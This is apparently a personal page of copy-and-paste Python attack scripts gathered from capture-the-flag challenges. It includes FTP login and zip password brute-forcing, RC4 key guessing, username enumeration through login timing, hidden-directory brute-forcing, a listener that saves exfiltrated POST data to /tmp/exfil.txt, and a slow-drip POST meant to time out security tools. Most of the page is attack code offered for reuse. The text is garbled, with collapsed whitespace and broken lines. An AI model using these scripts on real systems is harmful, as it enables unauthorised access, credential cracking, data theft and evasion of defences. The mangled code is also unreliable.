This is a page of quick wins and scripts written to achieve certain goals. Copy/paste parts as needed!
FTP Brute Force
Brute forces all passwords from words.txt for the username secure_usertry/except loop.
from ftplib import FTPimport timeftp =FTP()HOST =''PORT =2121ftp.set_debuglevel(2)dictionary ='words.txt'password =Nonewithopen(dictionary, 'r')as f:for line in f.readlines(): password = line.strip('\n')print('trying '+ password) time.sleep(0.001)try: ftp.connect(HOST, PORT) ftp.login(user='secure_user', passwd=password) ftp.quit()except:passprint(password)
RC4 Brute Force
ARC4 brute forcing script written to try and decrypt a string. The decryption attempt is passed to another loop to try and determine if the string is readable ASCII or not. I chose not to pause or quit the loop because I was getting some false positives.
from arc4 import ARC4cipher = b'\x55\x34\xe1\xb2\x17\xdc\x2a\xc5\x21\x26\x77\xe3\xae\x56\xed\x42\xc3\x28\x10\x40\x0a\xfc\xa2\x1d\xef\xab\x11\x1b\xc7'
withopen("big_set.txt", "r")as keys:for line in keys: line = line.strip() arc4 =ARC4(bytes(line, 'utf-8')) new = arc4.decrypt(cipher)try: decoder =bytes.fromhex(new.hex()).decode('utf-8')print("Key "+ line +" made this:\n"+ decoder)exceptUnicodeDecodeError:pass
Zip File Brute Force Guess with B64 Password
This script will attempt to unzip an archive with a password from rockyou. This particular challenge said the password was base64 encoded, which is what the first part of the loop is for. Second part of loop is a try/except loop to pass the unzip error with wrong password.
Alternatively, one could get the zip hash then convert the rockyou list into base64 for each line - I chose to NOT do this to prevent having an extra rockyou file full of base64.
import base64import zipfiledictionary ='/mnt/d/hashcat-6.0.0/rockyou.txt'withopen(dictionary, 'r', errors='ignore')as f:for line in f.readlines(): password = line.strip('\n')#print(f'Raw password is {password}') encoded = base64.b64encode(str.encode(password))#print(f'Encoded password is {encoded}')with zipfile.ZipFile('./','r')as zip_ref:try: zip_ref.extractall(pwd=encoded)print(f'Found! Password is {password}, encoded is {encoded}!')quit()except:pass
Connect to a Website, Establish Session, and Send Data
Establishing a session prevents multiple TCP connections from having to be opened. Additionally, taking the JSON and interpreting natively makes things useful!
This script adds a pin guess for a web login attempt. The pin is zfilled which makes 4 to 004. Additionally thereâs a regular expression to find if access was denied or not and give what the PIN was while breaking out of the loop. A final print statement lets me know that they were all looped through, useful when I wasn't sure if my requests were properly formatted.
This script pays attention to the timing between good usernames and bad ones to help determine if a username is valid.
import requestsfrom string import ascii_lowercasewithopen('surnames.txt')as f: lines = lname in lines:for init in ascii_lowercase: username = init+lname r ='', data = {'user':username,'pass':'haha'}) roundtrip = r.elapsed.total_seconds()print(f'{roundtrip} for {username}')
Connect to Raw Socket and Pass Data
This challenge required connecting to the socket and brute forcing the first byte back, I didnât fully finish this challenge because it was a little frustrating. I need to spend more time on this script.
Quick way to create a list of all possible lowercase values
from string import ascii_lowercasefor a in ascii_lowercase:for b in ascii_lowercase:print(a+b)
Below is brute forcing all lowercase characters to find a hidden web dir
import requestsfrom string import ascii_lowercaseurl =''for a in ascii_lowercase:for b in ascii_lowercase:for c in ascii_lowercase:#print(a+b+c) fullUrl = url + a + b + c r = requests.get(fullUrl)if r.status_code !=404:print(f'Code {r.status_code} for {fullUrl}')else:pass
Same one, just with a progress bar!
import requestsfrom import Barfrom string import ascii_lowercaseurl =''withBar('Brute Forcing...', max=26*26*26-1)as bar:for a in ascii_lowercase:for b in ascii_lowercase:for c in ascii_lowercase:#print(a+b+c) fullUrl = url + a + b + c r = requests.get(fullUrl)if r.status_code !=404:print(f'\nCode {r.status_code} for {fullUrl}')else:
Receive POST in Python
This uses to receive large items sent via POST
PORT =8000from http.server import HTTPServer, BaseHTTPRequestHandlerclassSimpleHTTPRequestHandler(BaseHTTPRequestHandler):defdo_GET(self): self.send_response(200) self.end_headers() self.wfile.write(b'Hello, world!')defdo_POST(self): content_length =int(self.headers['Content-Length']) body = self.send_response(200) self.end_headers() decoded = body.decode('utf-8')print('[+] Received: ')print(decoded) f =open('/tmp/exfil.txt', 'w') f.write(decoded)withHTTPServer(('localhost', PORT), SimpleHTTPRequestHandler)as httpd:print("[+] Running Server at", PORT, "Saving Files in /tmp/exfil.txt" ) httpd.serve_forever()#Run it: python3
Async HTTP Requests
These types of requests can try to time out various security tools by intentionally taking a very slow time to deliver a payload.
import asyncio, urllib.parse, sysfrom time import sleepasyncdefprint_http_headers(url):# Get our URL parts together url = urllib.parse.urlsplit(url)# Determine if HTTPS or notif url.scheme =='https': reader, writer =await asyncio.open_connection( url.hostname, 443, ssl=True)else: reader, writer =await asyncio.open_connection( url.hostname, 80)""" # Below is for a GET request to prove our async pipeline works as intended # Commented out to send exploit ##### query = [ f"GET {url.path or '/'} HTTP/1.1\r\n", f"Host: {url.hostname}\r\n", f"\r\n" ] """# Our exploit, this payload is json payload ='{"username":"m4lwhere","password":"lmao"}'# Build the HTTP request query = [ f"POST {url.path or '/'} HTTP/1.1\r\n", f"Host: {url.hostname}\r\n", f"Content-Length: {len(payload)}\r\n", f"Content-Type: application/json\r\n", f"\r\n" ]# Send the headers with only 1 second between each onefor i in query:print(i)# Let us see what's being sent as it happenssleep(1) writer.write(i.encode('latin-1'))# Now time to send our exploit print("sending payload...")# Split the payload into individual bytes instead of a whole stringfor i in payload:print(i)sleep(0.5)# Wait half a second before sending each byte writer.write(i.encode('latin-1'))# Send byte as its placed into writer# Now we wait for a responsewhileTrue: line =await reader.readline()ifnot line:break line = line.decode('latin1').rstrip()if line:print(f'{line}')# close the socket writer.close()# Pass the website in as an ARGV valueurl = sys.argv[1]